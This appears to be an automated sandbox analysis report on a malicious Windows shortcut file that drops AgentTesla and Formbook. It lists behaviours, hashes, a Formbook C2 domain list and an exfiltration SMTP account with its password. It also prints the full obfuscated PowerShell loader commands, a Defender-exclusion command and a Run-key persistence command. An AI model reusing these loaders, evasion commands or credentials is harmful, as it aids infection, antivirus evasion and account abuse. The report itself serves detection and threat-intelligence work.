Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02-04-2024 07:10
Static task
static1
Behavioral task
behavioral1
Sample
85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
Resource
win10v2004-20240226-en
General
-
Target
85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
-
Size
5.4MB
-
MD5
85e44c6e99f5f4043fc2c993b6fa633b
-
SHA1
21b3e0a10dd9798ef71fe073cdad7cfdadbfdeae
-
SHA256
62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789
-
SHA512
7c2f7183d40ac7bab91fa1a572c625e38e8f7ec848d54b7a937b6a33acc5868df3af72ae3a6187e8720303ff7aa7d00e7895ff77adfd504d8b394dacb34d30ff
-
SSDEEP
1536:U9I0i/p6qP3NUUSQryt/H7brkIYtppz5h5Z5S5k5+5L5XEYEpEz5d5zE/EVE/E/A:U94
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.abaamap.com.mx - Port:
587 - Username:
info@abaamap.com.mx - Password:
)I#!TlzV9@Kk
Extracted
formbook
4.1
en
fortezza.tours
unicornoptical.com
freezeframegame.com
osocrossfit.com
cutass.com
zhongrisk.com
seasandoman.com
global-care-recruiting.info
whenwesaywehaveitwedo.com
mithlapainting.com
sandringhamdarlington.net
futurevalleycontracting.com
goochandhousego.pro
valentindimitrov.com
maple-events.com
yourcreditchoice.com
virginity.bid
electricindians.com
intlgcap.com
ternionathletics.com
careymillersells.com
xn--sh5b25a34h.site
aadetermatology.com
bobosugar.com
flamingflavor.com
diamantverkauf.com
vicdux.network
colonhydrotherapyphila.com
darrenwongproperties.com
loisechly.com
mevlanaspot.com
erasethenegative.com
portaltonepal.com
portlandbuyback.com
academyofpods.com
birdofwisdom.com
littlehousenursery.com
xizled.com
betrayk.com
otisaffiliates.com
soyinyue.com
yourtownwebsite.com
three-rebels.com
gaso3.com
dreamcricketers.com
radiovtochq.com
pyrosoftgaming.com
uswebrootcosafe.com
zhongyingshangcheng.com
builtforthegreen.com
letskillracism.com
radishmehealthy.com
surferfin.com
preownedjamesavery.com
bestpottywatch.com
malwinamakeupartist.com
casino-players.com
emilyduffin.com
amiracle2remember.com
stevejackson2020.com
attenutechusa.net
gmslebanon.com
bostae.net
rangefish.com
alliancefb.com
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/964-108-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla -
Formbook payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/408-117-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral2/memory/408-130-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral2/memory/748-151-0x0000000000B90000-0x0000000000BBE000-memory.dmp formbook behavioral2/memory/748-171-0x0000000000B90000-0x0000000000BBE000-memory.dmp formbook -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exerundll32.exeWPmSHQjY348pIFB.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation WPmSHQjY348pIFB.exe -
Executes dropped EXE 4 IoCs
Processes:
WPmSHQjY348pIFB.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exepid process 2020 WPmSHQjY348pIFB.exe 3916 ePmSHQjY348pI3E.exe 964 ePmSHQjY348pI3E.exe 408 WPmSHQjY348pIFB.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4152 rundll32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UserPreferencesDefault = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\userpref.dll,main" powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
ePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exeWPmSHQjY348pIFB.execscript.exedescription pid process target process PID 3916 set thread context of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 2020 set thread context of 408 2020 WPmSHQjY348pIFB.exe WPmSHQjY348pIFB.exe PID 408 set thread context of 3424 408 WPmSHQjY348pIFB.exe Explorer.EXE PID 748 set thread context of 3424 748 cscript.exe Explorer.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exepowershell.execscript.exepid process 904 powershell.exe 904 powershell.exe 1052 powershell.exe 1052 powershell.exe 964 ePmSHQjY348pI3E.exe 964 ePmSHQjY348pI3E.exe 408 WPmSHQjY348pIFB.exe 408 WPmSHQjY348pIFB.exe 408 WPmSHQjY348pIFB.exe 408 WPmSHQjY348pIFB.exe 2328 powershell.exe 2328 powershell.exe 748 cscript.exe 748 cscript.exe 748 cscript.exe 748 cscript.exe 748 cscript.exe 748 cscript.exe 748 cscript.exe 748 cscript.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
WPmSHQjY348pIFB.execscript.exepid process 408 WPmSHQjY348pIFB.exe 408 WPmSHQjY348pIFB.exe 408 WPmSHQjY348pIFB.exe 748 cscript.exe 748 cscript.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowershell.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exepowershell.execscript.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 964 ePmSHQjY348pI3E.exe Token: SeDebugPrivilege 408 WPmSHQjY348pIFB.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 748 cscript.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
cmd.exepowershell.execsc.execsc.exerundll32.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exeExplorer.EXEcscript.exedescription pid process target process PID 3504 wrote to memory of 904 3504 cmd.exe powershell.exe PID 3504 wrote to memory of 904 3504 cmd.exe powershell.exe PID 904 wrote to memory of 1812 904 powershell.exe csc.exe PID 904 wrote to memory of 1812 904 powershell.exe csc.exe PID 1812 wrote to memory of 3624 1812 csc.exe cvtres.exe PID 1812 wrote to memory of 3624 1812 csc.exe cvtres.exe PID 904 wrote to memory of 2032 904 powershell.exe csc.exe PID 904 wrote to memory of 2032 904 powershell.exe csc.exe PID 2032 wrote to memory of 2184 2032 csc.exe cvtres.exe PID 2032 wrote to memory of 2184 2032 csc.exe cvtres.exe PID 904 wrote to memory of 2020 904 powershell.exe WPmSHQjY348pIFB.exe PID 904 wrote to memory of 2020 904 powershell.exe WPmSHQjY348pIFB.exe PID 904 wrote to memory of 2020 904 powershell.exe WPmSHQjY348pIFB.exe PID 904 wrote to memory of 3916 904 powershell.exe ePmSHQjY348pI3E.exe PID 904 wrote to memory of 3916 904 powershell.exe ePmSHQjY348pI3E.exe PID 904 wrote to memory of 3916 904 powershell.exe ePmSHQjY348pI3E.exe PID 904 wrote to memory of 4152 904 powershell.exe rundll32.exe PID 904 wrote to memory of 4152 904 powershell.exe rundll32.exe PID 4152 wrote to memory of 1052 4152 rundll32.exe powershell.exe PID 4152 wrote to memory of 1052 4152 rundll32.exe powershell.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 3916 wrote to memory of 964 3916 ePmSHQjY348pI3E.exe ePmSHQjY348pI3E.exe PID 2020 wrote to memory of 2328 2020 WPmSHQjY348pIFB.exe powershell.exe PID 2020 wrote to memory of 2328 2020 WPmSHQjY348pIFB.exe powershell.exe PID 2020 wrote to memory of 2328 2020 WPmSHQjY348pIFB.exe powershell.exe PID 2020 wrote to memory of 408 2020 WPmSHQjY348pIFB.exe WPmSHQjY348pIFB.exe PID 2020 wrote to memory of 408 2020 WPmSHQjY348pIFB.exe WPmSHQjY348pIFB.exe PID 2020 wrote to memory of 408 2020 WPmSHQjY348pIFB.exe WPmSHQjY348pIFB.exe PID 2020 wrote to memory of 408 2020 WPmSHQjY348pIFB.exe WPmSHQjY348pIFB.exe PID 2020 wrote to memory of 408 2020 WPmSHQjY348pIFB.exe WPmSHQjY348pIFB.exe PID 2020 wrote to memory of 408 2020 WPmSHQjY348pIFB.exe WPmSHQjY348pIFB.exe PID 3424 wrote to memory of 748 3424 Explorer.EXE cscript.exe PID 3424 wrote to memory of 748 3424 Explorer.EXE cscript.exe PID 3424 wrote to memory of 748 3424 Explorer.EXE cscript.exe PID 748 wrote to memory of 4432 748 cscript.exe cmd.exe PID 748 wrote to memory of 4432 748 cscript.exe cmd.exe PID 748 wrote to memory of 4432 748 cscript.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mT($gL) {$mW = $Null;Get-ChildItem $gL -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$yq = [String](Get-Content $_.FullName);$pH = 'VXJKUHSCSOQOTVAQOTOSEHMTYRYGQZIM';$lG = $yq.IndexOf($pH);if($lG -ne -1) {$Gc = $yq.SubString($lG);$mW = $Gc.Replace($pH,'')}};return $mW};function P($z) {$G = [Text.StringBuilder]::New();for($UzG=0;$UzG -lt $z.Length;$UzG+=2){[void]$G.Append([char][int]('0x'+$z.Substring($UzG,2)))}return $G.ToString()}$mW = mT $(Get-Location).Path;if($mW -eq $Null) {$mW = mT $($env:TEMP)};$wb = [ScriptBlock]::Create((P $mW));$wb.Invoke();3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A62.tmp" "c:\Users\Admin\AppData\Local\Temp\44kdoyi4\CSCA69300019FF348FA85C610318387F358.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B6C.tmp" "c:\Users\Admin\AppData\Local\Temp\ws3plhm5\CSC11EC4AB883324584A1118424AF585A4.TMP"5⤵
-
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\userpref.dll,main4⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $oUa = [string][char[]]@(0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x64,0x28,0x24,0x6C,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x49,0x23,0x3D,0x23,0x5B,0x54,0x65,0x78,0x74,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x42,0x75,0x69,0x6C,0x64,0x65,0x72,0x5D,0x3A,0x3A,0x4E,0x65,0x77,0x28,0x29,0x0D,0x0A,0x66,0x6F,0x72,0x28,0x24,0x51,0x3D,0x30,0x3B,0x24,0x51,0x23,0x2D,0x6C,0x74,0x23,0x24,0x6C,0x2E,0x4C,0x65,0x6E,0x67,0x74,0x68,0x3B,0x24,0x51,0x2B,0x3D,0x32,0x29,0x7B,0x0D,0x0A,0x5B,0x76,0x6F,0x69,0x64,0x5D,0x24,0x49,0x2E,0x41,0x70,0x70,0x65,0x6E,0x64,0x28,0x5B,0x43,0x68,0x61,0x72,0x5D,0x5B,0x49,0x6E,0x74,0x5D,0x28,0x27,0x30,0x78,0x27,0x2B,0x24,0x6C,0x2E,0x53,0x75,0x62,0x73,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x51,0x2C,0x32,0x29,0x29,0x29,0x7D,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x49,0x2E,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x29,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x76,0x28,0x24,0x4F,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x42,0x69,0x74,0x43,0x6F,0x6E,0x76,0x65,0x72,0x74,0x65,0x72,0x5D,0x3A,0x3A,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x4F,0x29,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x24,0x6C,0x2E,0x72,0x65,0x70,0x6C,0x61,0x63,0x65,0x28,0x27,0x2D,0x27,0x2C,0x27,0x27,0x29,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x6C,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x4D,0x28,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x5A,0x23,0x3D,0x23,0x27,0x48,0x4B,0x43,0x55,0x3A,0x5C,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x23,0x50,0x61,0x6E,0x65,0x6C,0x5C,0x44,0x65,0x73,0x6B,0x74,0x6F,0x70,0x27,0x0D,0x0A,0x24,0x74,0x23,0x3D,0x23,0x47,0x65,0x74,0x2D,0x49,0x74,0x65,0x6D,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x79,0x23,0x2D,0x50,0x61,0x74,0x68,0x23,0x24,0x5A,0x23,0x2D,0x4E,0x61,0x6D,0x65,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x23,0x2D,0x45,0x72,0x72,0x6F,0x72,0x41,0x63,0x74,0x69,0x6F,0x6E,0x23,0x53,0x69,0x6C,0x65,0x6E,0x74,0x6C,0x79,0x43,0x6F,0x6E,0x74,0x69,0x6E,0x75,0x65,0x23,0x7C,0x23,0x53,0x65,0x6C,0x65,0x63,0x74,0x2D,0x4F,0x62,0x6A,0x65,0x63,0x74,0x23,0x2D,0x45,0x78,0x70,0x61,0x6E,0x64,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x0D,0x0A,0x24,0x57,0x23,0x3D,0x23,0x76,0x23,0x24,0x74,0x0D,0x0A,0x24,0x70,0x23,0x3D,0x23,0x64,0x23,0x24,0x57,0x0D,0x0A,0x49,0x6E,0x76,0x6F,0x6B,0x65,0x2D,0x45,0x78,0x70,0x72,0x65,0x73,0x73,0x69,0x6F,0x6E,0x23,0x24,0x70,0x7D,0x0D,0x0A,0x4D) -replace ' ','';$FTX = [string][char[]]@(0x69,0x4E,0x56,0x4F,0x4B,0x65,0x2D,0x65,0x58,0x70,0x72,0x45,0x73,0x73,0x69,0x4F,0x4E) -replace ' ','';sal tWz $FTX;$oUa = $oUa.replace('#', ' ');tWz $oUa5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ePmSHQjY348pI3E.exe.logFilesize
1KB
MD58ec831f3e3a3f77e4a7b9cd32b48384c
SHA1d83f09fd87c5bd86e045873c231c14836e76a05c
SHA2567667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA51226bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51a7cb2c958fed2a19946910247a6bd8d
SHA1096d10204554b23ed0094f94d86612dff53420e8
SHA2560ea0baf7d52e32bc9808835ba578e2f6cd2affebb1855025edcc91f5d0a7fa9e
SHA51272b6b31f9795613d3e84cb7b639186028c50a250bb68e1bcec5dbe3bf5487f64495ba103d16734de48771319dbeb7645732a9c63f4b027e273e94235a6f61af5
-
C:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.dllFilesize
3KB
MD5c07ca427ebc758439206761e91e2454b
SHA1d3df6cd862930e2426990f7b1866f5008b1fe4e3
SHA256d9b2b863f1a4393a7d04259205ab1c2adc72b50a47d5b209d46bb61cc9722459
SHA512a9aa8b416dd689eabd1ccdf71b0ef8f7ae05fbba778b84033519314a8a687abae2a8c3cdcf8b08fb545d0f37e5f1895db00cc6fdb48b7e3e8206b7b56cf24180
-
C:\Users\Admin\AppData\Local\Temp\RES6A62.tmpFilesize
1KB
MD5105e09c5ace41876c9945bf72440c8ac
SHA116ab5437505fc9f27fae9f6788f7ff07b247ca90
SHA25634a7b2a274d7736381450ffb3083119eec93174973d34e07e7165c522e893888
SHA512ee210a686e472af22c7bf8d5fb643d452908b2e493524862b041820470c429c7cb17bb2b28286a349c8eb3f4a98a92c33faf3d77b50a66d816f5b190f395aafc
-
C:\Users\Admin\AppData\Local\Temp\RES6B6C.tmpFilesize
1KB
MD545d69c944cf5049099a4e5b4c0e89d68
SHA167c4268e4c57cdda01fcd2cb02e167b9b5b8ac46
SHA256d3d1469eb869624529b0734828f1955954d2b3dce237588f6c7a94839c1090f3
SHA512009f28b4fe7a4333b21058d7d080ff62e1035f912be9fd7238b6315efaa0becf338f7ca10b56d8096d5d7e7ee3bef251aace27345e7318edd2250db4607a9dd4
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcbalzd1.xcq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.dllFilesize
3KB
MD5aaf16059d4022218bea5a1616d1c59d4
SHA19898fa3721c4997050e2335b4c122265065f3549
SHA2561cfe18ff5b78b191e28edfb54de2e770bfa3d3978816dcaf71ddae82ce31fb47
SHA5129b1cd6d1426d33ee8dd8cc3136d59a01edccd23be6e53ab836b139d9d946e7ff4a499df67ab737089817ec34a1f571aeb8c9dccf812668149175fd1b836abc61
-
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exeFilesize
658KB
MD52620dc7fb3253116bacda0b5edaf27d3
SHA17d2d0b70770d7e7f94bcb3d38d2eeba5b25d14e3
SHA2565c9f46bbd04381ba4acbeae46924894bf18b5982171c71c14f8e669312de01b3
SHA512207b50bc49898aabcbe6310bd48b9ee823866891c872162d7fe229b6ebe153ab8b4ef8b86152c0120874a4ac3af13c7a4d2e6e02c38d6e4a5ae0e05c18c62148
-
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exeFilesize
699KB
MD5aa5537a757a0d71658cc29410a73827e
SHA1a4cdf6bea0b141afcf2bc2b3aeae9f9c07b23f42
SHA2569ca64b1a5aa9526120827a68766d0e4c5d7e6b35d4729af573d88b0cf81f53ae
SHA51281593a59e8e1503af981d034b7c21339b815c3cb58218e60219b0af2f9bf9e5f91749d546e08251ce684e2469ae7c238e72b2e84afd664d459a63ba8e277a0d1
-
C:\Users\Admin\AppData\Roaming\userpref.dllFilesize
17KB
MD55b2e8b0887e41ff72ac66799beeccb90
SHA182bbe01b7a2cb252892a5bed5d5af58fb641cd38
SHA256739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441
SHA5123ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53
-
\??\c:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.0.csFilesize
445B
MD5c0136606a60235ac4eedf5ebfbf72242
SHA13adc968e7d42959b5b6892ad9836b9e5a7a80247
SHA25636a3409023121f56e60418e19521f1241ee5ab41b8c299d04c53fe63a83a054f
SHA5121c09303dc198f6cd9d2f2f73290089f3d4056379e4f76ec081871b06b920b5e548b017a047eeadcb535761f5c436f6a4abec7a848337c1fe65209d9cf43abaed
-
\??\c:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.cmdlineFilesize
369B
MD5b9bae660fee0efb87ea7ca2d87075fa1
SHA10fabd884e8a13bb53a986ac767a682ed1d584f6c
SHA25684672bff50018c932904158680326f639f77eb0faf79af02404d1aadd8d95318
SHA512330e6bd65df89bb7a9a279899a894c543e430d0812da5bbed68697532c4de94f60af09bdc5c9617e1adb294fa1e23e6dec48bab5583cc6da90dc27afb8c1bada
-
\??\c:\Users\Admin\AppData\Local\Temp\44kdoyi4\CSCA69300019FF348FA85C610318387F358.TMPFilesize
652B
MD504ef1123c24df81003dab587589e0ff2
SHA1f39826eb7cd130e778e7e82c32e613e6eb952798
SHA256e410fd4b39f160fae57feb26c7b585f3ffb48c1e938899380b3810a9012d20b8
SHA5123d9f019942a966427a8a99ac2a74e51e1703c14abadb8b530584bf322260300aa8b3521fe00596b20dc8d8fecd4d468962a810fa08351638b4d7266fc3f6c823
-
\??\c:\Users\Admin\AppData\Local\Temp\ws3plhm5\CSC11EC4AB883324584A1118424AF585A4.TMPFilesize
652B
MD598cb453568fe2f03b9f006cbd3b88c1f
SHA1ba43d5ca61b6c83cb35d4e8c0d3b90fee2820018
SHA25625c5de2e69e9945490019c5e5f6860d64058c769d8453952088cdb665242efe1
SHA512e72d4369a7a8d558ea24705458180b2eb8e7369d08426850fef777c321955f826a8c9dd724538e6a1d9daea19fa4158921e6f842e01fb2b6043c41472a7c6579
-
\??\c:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.0.csFilesize
292B
MD57e8be7de46cb8a991a864885286e1db9
SHA1600af06d154bc655d186b295205542a049957ae8
SHA2562d66ad50bdbe759adf78a4f7de6f39c4d98b49ad83083eae1ea95130affa9ac4
SHA512b0b01f8cad3150c16dbcc198ad15ed2c117bbfcfd5969438646b7c10de95939f238775e0faf7404e633232cfee55281a25b8d3762c0542cb3d2df9def4ba9653
-
\??\c:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.cmdlineFilesize
369B
MD5b33deecfc86298c926fd881af1b35b06
SHA15e65602e75b01e8838194959b1c8cea5bc7ba212
SHA256f08f8ac3c3ac6f7a37e6be989db4c5edfa7ae20ba72f9d608f15bcdf843b2007
SHA512d519aa3afea45d67e40bcb3613a6ae05117d545f7767ce2b954156dbb7e61ca44e5a36d384c6b6954ab3634919d3f01a7a65eb7df85d423d8aac677402998280
-
memory/408-129-0x00000000005E0000-0x00000000005F4000-memory.dmpFilesize
80KB
-
memory/408-130-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/408-126-0x0000000000E80000-0x00000000011CA000-memory.dmpFilesize
3.3MB
-
memory/408-117-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/748-152-0x0000000002F10000-0x000000000325A000-memory.dmpFilesize
3.3MB
-
memory/748-150-0x0000000000430000-0x0000000000457000-memory.dmpFilesize
156KB
-
memory/748-151-0x0000000000B90000-0x0000000000BBE000-memory.dmpFilesize
184KB
-
memory/748-149-0x0000000000430000-0x0000000000457000-memory.dmpFilesize
156KB
-
memory/748-171-0x0000000000B90000-0x0000000000BBE000-memory.dmpFilesize
184KB
-
memory/904-27-0x00000272E5190000-0x00000272E5198000-memory.dmpFilesize
32KB
-
memory/904-13-0x00000272E5210000-0x00000272E5220000-memory.dmpFilesize
64KB
-
memory/904-41-0x00000272E75D0000-0x00000272E75D8000-memory.dmpFilesize
32KB
-
memory/904-11-0x00000272E51A0000-0x00000272E51C2000-memory.dmpFilesize
136KB
-
memory/904-78-0x00007FFAC5D20000-0x00007FFAC67E1000-memory.dmpFilesize
10.8MB
-
memory/904-14-0x00000272E5210000-0x00000272E5220000-memory.dmpFilesize
64KB
-
